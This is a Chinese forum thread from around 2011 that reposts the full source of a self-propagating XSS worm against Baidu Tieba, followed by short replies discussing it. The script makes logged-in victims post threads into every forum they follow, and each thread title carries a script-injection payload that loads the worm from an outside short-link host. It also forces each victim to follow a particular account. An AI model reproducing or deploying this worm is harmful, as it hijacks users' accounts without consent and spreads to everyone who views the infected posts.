最近出现的据说是盗取密码的post.js的原代码
function createXHR(){
return window.XMLHttpRequest?
new XMLHttpRequest():
new ActiveXObject("Microsoft.XMLHTTP");
}
function getmyforum(url){
xmlHttp = createXHR();
xmlHttp.open("GET",url,false);
xmlHttp.send();
result = xmlHttp.responseText;
result = result.match(/\/f\?kw=*&from=ucenter/g);
return result;
}
function getarg(forumurl){
xmlHttp = createXHR();
xmlHttp.open("GET",forumurl,false);
xmlHttp.send();
result = xmlHttp.responseText;
forumname = result.match("hidden\" name=\"kw\" id=\"kw\" value=\"[^\"]*").toString().split('"');
forumname = encodeURIComponent(forumname);
fid = result.match("hidden\" name=\"fid\" id=\"fid\" value=\"[^\"]*").toString().split('"');
tbs = result.match("PageData.tbs = \"+\";").toString().split('"');
return ;
}
function publish_delay(data,i){
var t=setTimeout("publish(data)",1000*i);
}
function publish(data){
url="http://tieba.baidu.com/f/commit/thread/add";
xmlHttp = createXHR();
xmlHttp.open("POST",url,false);
xmlHttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");
xmlHttp.send(data);
}
function followme(){
url = "http://tieba.baidu.com/i/181104344";
xmlHttp = createXHR();
xmlHttp.open("GET",url,false);
xmlHttp.send();
result = xmlHttp.responseText;
tbs = result.match("[^_]tbs : \"*\"").toString().split('"');
portrait = result.match(/UserInfo.request\(\"*/).toString().split('"');
if(tbs == null || portrait == null){
return;
}
inf = 'cmd=follow&tbs=' + tbs + '&portrait=' + portrait;
url="http://tieba.baidu.com/i/commit?stamp=" + new Date().getTime();;
xmlHttp = createXHR();
xmlHttp.open("POST",url);
xmlHttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");
xmlHttp.send(inf);
}
function random_msg(){
var tarr = new Array(
'说不过就删帖封号,有意思吗?',
'这个楼我们一定要盖啊啊啊?',
'绝对震撼人心的语录,2011年',
'显然,或者,哦,这事做错了?');
var carr = new Array(
' RT ',
' 难道不是吗? ',
' 如题',
'我想说啥来着??',
'我爱大清国,我怕他完了....');
title = tarr;
content = carr;
return ;
}
function main(){
document.getElementsByTagName('h1').innerHTML = document.getElementsByTagName('h1').innerHTML.split('/scr');
if(!PageData.is_login){
tagp = document.getElementsByTagName('p');
for (i=0;i<tagp.length;i++){
if(tagp.innerHTML == '1楼'){
tagp.innerHTML = 'BS你。看帖不登陆、不回帖、不顶贴的淫,我咒你木有小JJ!!';
i = tagp.length;
}
}
throw 'err';
}
myforum = 'http://tieba.baidu.com/f/user/myforum?v=' + new Date().getTime();
forumarr = getmyforum(myforum);
wormurl = encodeURIComponent('</script><script/src=//qr.net/edrn>');
for (i=0;i<forumarr.length;i++){
msg = random_msg();
forumurl = 'http://tieba.baidu.com' + forumarr;
argarr = getarg(forumurl);
data = 'kw=' + argarr;
data = data + '&fid=' + argarr;
data = data + '&tid=0&floor_num=0&vcode_md5=&pic_url=&rich_text=1&hasuploadpic=0&picsign=&tfrom=1';
data = data + '&title=' + msg + wormurl + '&content=' + msg + '%40samy_joke%3Cbr%3E';
data = data + '&add_post_submit=%20%E5%8F%91%20%E8%A1%A8%20&ie=utf-8';
data = data + '&tbs=' + argarr;
publish(data);
}
followme();
}
var t=setTimeout("main()",3000);
很简单的一段代码
本帖最后由 ooxoo 于 2011-6-26 20:15 编辑
……简单……么……
……话说看到57-66行咱认出来了……
……点进去之后关掉立刻改密码有用么……
能不能说一说,这个工作过程呢?(看不明白……) 回复 MAX清水星 的帖子
这里没有看到有涉及cookie的内容、所以严格说起来这段脚本里没有盗号功能…… 简单个头啊!...变量名函数名过程名这么长有木有啊!... 只是执行发帖行为?太恶趣味了啊…… 这恶作剧……
刚从外面回来就看到发生了这些事情。 不行……現在讀代碼會頭暈…… 中枪了,想都没想就去改了密码。看来是多此一举啊 说实话我想起了这个死亡问答 ←
页:
[1]